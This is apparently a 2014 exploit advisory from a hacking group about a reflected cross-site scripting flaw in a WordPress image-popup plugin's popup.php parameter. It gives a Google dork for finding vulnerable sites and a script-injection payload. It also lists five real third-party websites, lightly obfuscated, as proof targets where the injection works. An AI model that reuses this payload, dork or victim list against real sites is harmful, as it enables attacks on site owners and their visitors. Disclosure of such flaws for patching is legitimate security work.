|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [*] Exploit Title: Wordpress simple popup images Cross site scripting Vulnerability | | [*] Exploit Author: Ashiyane Digital Security Team | | [*] Date : Date: 2014-05-21 | | [*] Vendor Homepage : http://www.wordpress.org | | [*] Google Dork: inurl:wp-content/plugins/simple-popup-images | | [*] Tested on: Windows 7 | | [*] Web browser : mozilla firefox |-------------------------------------------------------------------------| | | [*] Location : [localhost]/wp-content/plugins/simple-popup-images/popup.php?z=[XSS] | |-------------------------------------------------------------------------| | [*] Proof: | | [*] http://www.itstoXpeka.com/ITSblog/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script> | | [*] http://www.easyXwebcreations.com/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script> | | [*] http://www.steaXlthcopter.com/blog/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script> | | [*] http://www.pferdXehof-muellerschoen.de/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script> | | [*] http://www.wabXei-mono.com/embroidery/wp-content/plugins/simple-popup-images/popup.php?z="/><script>alert(1);</script> |-------------------------------------------------------------------------| | [*] Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|